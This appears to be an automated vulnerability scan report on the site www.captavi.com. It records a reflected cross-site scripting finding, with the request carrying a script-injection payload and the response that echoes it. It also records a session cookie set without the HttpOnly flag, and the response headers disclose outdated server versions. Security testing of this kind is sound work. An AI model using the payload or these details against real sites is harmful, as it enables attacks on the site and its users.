1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://www.captavi.com |
Path: | / |
GET /?73092"><script>alert(1)< Host: www.captavi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 07 Jan 2011 21:36:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 SVN/1.6.0 X-Powered-By: PHP/4.4.9 Pragma: Cache-control: Expires: Set-Cookie: PHPSESSID=c068e0bdd4 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17885 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <form name="polls" action="index.php?73092"><script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.captavi.com |
Path: | / |
GET / HTTP/1.1 Host: www.captavi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 07 Jan 2011 21:36:16 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 SVN/1.6.0 X-Powered-By: PHP/4.4.9 Pragma: Cache-control: Expires: Set-Cookie: PHPSESSID=d61455f7d3 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17839 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... |